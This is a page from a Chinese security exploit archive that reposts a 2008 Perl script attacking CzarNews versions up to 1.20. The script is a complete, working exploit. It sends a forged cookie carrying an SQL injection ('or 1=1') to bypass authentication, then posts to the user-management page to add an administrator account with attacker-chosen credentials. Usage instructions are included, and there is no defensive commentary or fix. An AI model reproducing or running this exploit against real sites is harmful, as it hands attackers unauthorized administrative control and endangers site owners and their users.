首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CzarNews <= 1.20 (Cookie) Remote SQL Injection Exploit
来源:StAkeR[at]hotmail[dot]it 作者:StAkeR 发布时间:2008-09-16  
#!/usr/bin/perl
# ----------------------------------------------------------
# CzarNews <= v1.20 (Cookie) Remote SQL Injection Exploit
# Perl Exploit - Add a new admin with your credentials!
# Discovered On: 15/09/2008
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# ----------------------------------------------------------
# Usage: perl http://localhost/cms StAkeR obscure
# ----------------------------------------------------------

use strict;
use LWP::UserAgent;

my $email = 'some@example.net';
my ($hostname,$username,$password) = @ARGV;
my $request  = undef;
my $http_s   = new LWP::UserAgent or die $!;

$hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner();
banner() unless $username and $password;

$http_s->agent("Mozilla/4.5 [en] (Win95; U)");
$http_s->timeout(1);
$http_s->default_header('Cookie' => "recook=' or '1=1,' or '1=1");          

$request = $http_s->post($hostname."/cn_users.php",
                         [
                          user    => $username,
                          pass    => $password,
                          email   => $email,
                          allcats => "all",
                          admin   => "off",
                          news    => "on",
                          images  => "on",
                          users   => "on",
                          categories => "on",
                          config  => "on",
                          words  => "on",
                          op => "add",
                          id => '',
                          go  => "true",
                          submit => "Add+User"
                        ]);
       
if($request->is_success)
{
  if($request->content =~ /has been added/i)
  {
    print "[+] Added New Administrator: $username & $password\n";
  }
  else
  {
    print "[!] Exploit Failed!\n";
    print "[!] Site Not Vulnerable\n";
  }
}


sub banner
{
  print "[+] CzarNews <= v1.20 Remote SQL Injection Exploit (add new admin)\n";
  print "[+] Usage: perl exploit.pl [host] [username] [password]\n";
  return exit;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·The Personal FTP Server 6.0f R
·MS Windows WRITE_ANDX SMB comm
·Windows Media Encoder wmex.dll
·Sports Clubs Web Panel 0.0.1 R
·pLink 2.07 (linkto.php id) Rem
·Yourownbux 4.0 (COOKIE) Authen
·QuickTime 7.5.5 / ITunes 8.0 R
·Maxthon Browser 2.1.4.443 UNIC
·Postfix < 2.4.9, 2.5.5, 2.6-20
·minb 0.1.0 Remote Code Executi
·WonderWare SuiteLink 2.0 Remot
·phsBlog 0.2 Bypass SQL Injecti
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved